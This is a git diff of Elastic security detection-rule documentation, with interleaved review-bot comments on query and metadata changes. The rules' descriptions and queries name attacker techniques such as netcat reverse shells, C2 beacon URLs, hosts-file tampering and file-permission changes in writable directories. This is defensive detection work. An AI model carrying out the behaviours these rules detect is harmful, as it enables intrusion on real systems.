@@ -36,7 +36,7 @@ Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -126,3 +126,7 @@ process where host.os.type == "windows" and event.type == "start" and process.pa ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc index 66806b7a62..210b9d2b94 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-tsclient-mountpoint.asciidoc @@ -35,7 +35,7 @@ Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint ts * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -71,3 +71,7 @@ process where host.os.type == "windows" and event.type == "start" and process.ex ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc index 39b3a2582c..b83d90578b 100644 --- a/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/expired-or-revoked-driver-loaded.asciidoc 
@@ -29,10 +29,10 @@ Identifies an attempt to load a revoked or expired driver. Adversaries may bring * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation -* Rule Type: BBR +* Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -61,3 +61,15 @@ driver where host.os.type == "windows" and process.pid == 4 and ** Name: Exploitation for Privilege Escalation ** ID: T1068 ** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc index b4d3de4fd7..7b1dd1bf35 100644 --- a/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/exporting-exchange-mailbox-via-powershell.asciidoc @@ -33,11 +33,12 @@ Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, * OS: Windows * Use Case: Threat Detection * Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
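Review bot: removing `* Rule Type: BBR` from `expired-or-revoked-driver-loaded` promotes it from a building-block rule to a regular alerting rule, which is a behaviour change for anyone who has it enabled, yet the only other edits in the hunk are the added Defense Evasion tactic and a version bump from 2 to 3. Call the promotion out explicitly in the release notes for 8.10.5 so operators know this rule will now surface alerts.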
@@ -122,3 +123,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Remote Email Collection ** ID: T1114.002 ** Reference URL: https://attack.mitre.org/techniques/T1114/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc index 4c37d880e8..6abd066825 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the creation of a file, followed by its execution and sel * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc index d21981beff..4c3f3cc176 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-deletion-via-shred.asciidoc @@ -29,7 +29,7 @@ Malware or other files dropped or created on a system by an adversary may leave * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc index 458898c20c..5437830991 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-made-immutable-by-chattr.asciidoc @@ -32,7 +32,7 @@ Detects a file being made immutable using the chattr binary. Making a file immut * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -41,47 +41,6 @@ Detects a file being made immutable using the chattr binary. Making a file immut *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
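Review bot: the whole `==== Investigation guide` block of `file-made-immutable-by-chattr` (Elastic Defend setup, Auditbeat setup and the custom ingest pipeline note) is deleted with nothing in its place, leaving the rule page with no setup guidance. If the guide was removed on purpose, drop any `Resources: Investigation Guide` tag the rule still carries in the same change so the tag and the page agree, and if it was removed only to fix the stale `{security-guide}/fleet/8.10/agent-policy.html` link, fixing the link would be the smaller change.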
diff --git a/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc index 8028c96f9c..7299d6bf25 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-permission-modification-in-writable-directory.asciidoc @@ -3,7 +3,7 @@ Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -30,7 +30,7 @@ Identifies file permission modifications in common writable directories by a non * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 206 *Rule authors*: @@ -44,11 +44,9 @@ Identifies file permission modifications in common writable directories by a non [source, js] ---------------------------------- -process where host.os.type == "linux" and event.type == "start"and - process.name in ("chmod", "chown", "chattr", "chgrp") and - process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and - not process.parent.name in ("update-motd-updates-available") and - not user.name == "root" +host.os.type:linux and event.category:process and event.type:start and +process.name:(chmod or chown or chattr or chgrp) and +process.working_directory:("/tmp" or "/var/tmp" or "/dev/shm") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc index fa5fbd5814..217eaa2134 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc 
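Review bot: the new `new_terms` query for `file-permission-modification-in-writable-directory` drops both `not user.name == "root"` and `not process.parent.name in ("update-motd-updates-available")`, but the unchanged description still says the rule identifies modifications "by a non-root user". Either keep the `not user.name:root` condition in the KQL version or reword the description, and say in the page why the `update-motd-updates-available` exclusion is no longer needed (a new-terms rule will still fire the first time that parent is seen per host).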
+++ b/docs/detections/prebuilt-rules/rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc @@ -30,7 +30,7 @@ Identifies files written to the root of the Recycle Bin folder instead of subdir * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -61,3 +61,7 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Data Staged ** ID: T1074 ** Reference URL: https://attack.mitre.org/techniques/T1074/ +* Sub-technique: +** Name: Local Data Staging +** ID: T1074.001 +** Reference URL: https://attack.mitre.org/techniques/T1074/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc index 667212f249..77cc355342 100644 --- a/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/file-transfer-or-listener-established-via-netcat.asciidoc @@ -38,7 +38,7 @@ A netcat process is engaging in network activity on a Linux host. Netcat is ofte * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -90,6 +90,7 @@ This rule identifies potential reverse shell or bind shell activity using Netcat - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc index b7f2a673a1..bf58ea2539 100644 
--- a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc @@ -33,7 +33,7 @@ An adversary equipped with compromised credentials may attempt to access the sec * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 207 +*Version*: 308 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc index 3d4c83ac79..995a424d7f 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-seen-driver-loaded.asciidoc @@ -28,11 +28,12 @@ Identifies the load of a driver with an original file name and signature values * Domain: Endpoint * OS: Windows * Use Case: Threat Detection +* Tactic: Privilege Escalation * Tactic: Persistence * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -121,6 +122,14 @@ event.category:"driver" and host.os.type:windows and event.action:"load" *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc b/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc index 9c182700fd..acf0db1abf 100644 --- a/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc 
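Review bot: `first-time-seen-aws-secret-value-accessed-in-secrets-manager` jumps from version 207 to 308 while the only line that changes in its doc is the version itself. Elsewhere in this change a +101 bump accompanies a visible rule-type conversion (`file-permission-modification-in-writable-directory`, eql to new_terms, 105 to 206); here there is no such hunk, so either the corresponding rule change is missing from the docs or the bump should be 208.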
+++ b/docs/detections/prebuilt-rules/rule-details/firsttime-seen-account-performing-dcsync.asciidoc @@ -36,11 +36,12 @@ This rule identifies when a User Account starts the Active Directory Replication * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Use Case: Active Directory Monitoring * Data Source: Active Directory * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -119,3 +120,15 @@ event.action:"Directory Service Access" and event.code:"4662" and ** Name: DCSync ** ID: T1003.006 ** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc index 75284f0122..f641f454b3 100644 --- a/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/halfbaked-command-and-control-beacon.asciidoc @@ -33,7 +33,7 @@ Halfbaked is a malware family used to establish persistence in a contested netwo * Tactic: Command and Control * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: 
@@ -57,10 +57,10 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -(event.dataset: (network_traffic.tls or network_traffic.http) or - (event.category: (network or network_traffic) and network.protocol: http)) and - network.transport:tcp and url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ and - destination.port:(53 or 80 or 8080 or 443) +(event.dataset: (network_traffic.tls OR network_traffic.http) OR + (event.category: (network OR network_traffic) AND network.protocol: http)) AND + network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ AND + destination.port:(53 OR 80 OR 8080 OR 443) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc index da219ac91d..0326af8398 100644 --- a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of Okta user password reset or account unlock attempts. * Data Source: Okta * Tactic: Defense Evasion -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc index d1ec96d37e..7e898ce380 100644 --- a/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc 
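Review bot: the `halfbaked-command-and-control-beacon` hunk rewrites the query lines but keeps the unescaped dots in `url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/`; in a regex `.` matches any character, so the pattern also matches any run of digits of the right length and does not actually require a dotted IPv4 literal. Since the line is being touched anyway, escape the separators as `\.`.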
@@ -32,7 +32,7 @@ This rule identifies a high number (10) of process terminations via pkill from t * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -79,6 +79,7 @@ This rule identifies a high number (10) of process terminations via pkill from t - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc index a855b25b6f..992188c319 100644 --- a/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc @@ -37,7 +37,7 @@ The hosts file on endpoints is used to control manual IP address to hostname res * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -94,7 +94,8 @@ any where miss this, which is the purpose of the process + command line args logic below */ ( event.category == "file" and event.type in ("change", "creation") and - file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") + file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") and + not process.name in ("dockerd", "rootlesskit", "podman", "crio") ) or @@ -102,7 +103,8 @@ any where ( event.category == "process" and event.type in ("start") and process.name in ("nano", "vim", "vi", "emacs", "echo", "sed") and - process.args : ("/etc/hosts") + process.args : ("/etc/hosts") and + not process.parent.name in ("dhclient-script", "google_set_hostname") ) ---------------------------------- 
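Review bot: the new exclusions in `hosts-file-modified` key only on names, `not process.name in ("dockerd", "rootlesskit", "podman", "crio")` for the file branch and `not process.parent.name in ("dhclient-script", "google_set_hostname")` for the process branch, so an attacker who copies an editor or script to a file called `dockerd` bypasses the rule entirely. Prefer `process.executable` paths for the container runtimes (and `process.parent.executable` for the two scripts) so the exclusion is tied to where the binary lives rather than what it is called.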
diff --git a/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc index ee5536c39c..1b9e613c7b 100644 --- a/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc @@ -34,7 +34,7 @@ Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc b/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc index 9ba7d91a2a..1181ca393c 100644 --- a/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc @@ -30,10 +30,11 @@ The Debugger and SilentProcessExit registry keys can allow an adversary to inter * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,3 +78,11 @@ registry where host.os.type == "windows" and length(registry.data.strings) > 0 a ** Name: Image File Execution Options Injection ** ID: T1546.012 ** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc b/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc new file mode 100644 index 0000000000..956d15ac4c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc 
@@ -0,0 +1,70 @@ +[[image-loaded-with-invalid-signature]] +=== Image Loaded with Invalid Signature + +Identifies binaries that are loaded and with an invalid code signature. This may indicate an attempt to masquerade as a signed binary. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and event.action == "load" and + dll.code_signature.status : ("errorUntrustedRoot", "errorBadDigest", "errorUntrustedRoot") and + (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and + not startswith~(dll.name, process.name) and + not dll.path : ( + "?:\\Windows\\System32\\DriverStore\\FileRepository\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc b/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc index a485347315..9cc0bbb3a4 100644 
--- a/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc @@ -31,7 +31,7 @@ Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), * Tactic: Initial Access * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: @@ -53,8 +53,8 @@ Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), [source, js] ---------------------------------- -(event.dataset: network_traffic.http or (event.category: network_traffic and network.protocol: http)) and - status:OK and destination.port:9200 and network.direction:inbound and NOT http.response.headers.content-type:"image/x-icon" and not +(event.dataset: network_traffic.http OR (event.category: network_traffic AND network.protocol: http)) AND + status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:"image/x-icon" AND NOT _exists_:http.request.headers.authorization ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc b/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc index bdf25d3a2f..ee13edaf68 100644 --- a/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc @@ -31,9 +31,10 @@ Identifies the use of Distributed Component Object Model (DCOM) to run commands * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -71,3 +72,15 @@ sequence by host.id with maxspan=1m ** Name: Distributed Component Object Model ** ID: T1021.003 ** Reference URL: https://attack.mitre.org/techniques/T1021/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc b/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc index 330aad57ec..4b8273e6e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc @@ -31,9 +31,10 @@ Identifies remote execution via Windows PowerShell remoting. Windows PowerShell * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -69,3 +70,15 @@ sequence by host.id with maxspan = 30s ** Name: Windows Remote Management ** ID: T1021.006 ** Reference URL: https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc b/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc index 178021a263..38e438a08e 100644 --- a/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc @@ -30,10 +30,11 @@ Identifies registry modifications related to the Windows Security Support Provid * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -80,3 +81,11 @@ registry where host.os.type == "windows" and ** Name: Security Support Provider ** ID: T1547.005 ** Reference URL: https://attack.mitre.org/techniques/T1547/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc index d5868a04da..5038815ada 100644 --- a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc @@ -32,7 +32,7 @@ Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a si * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
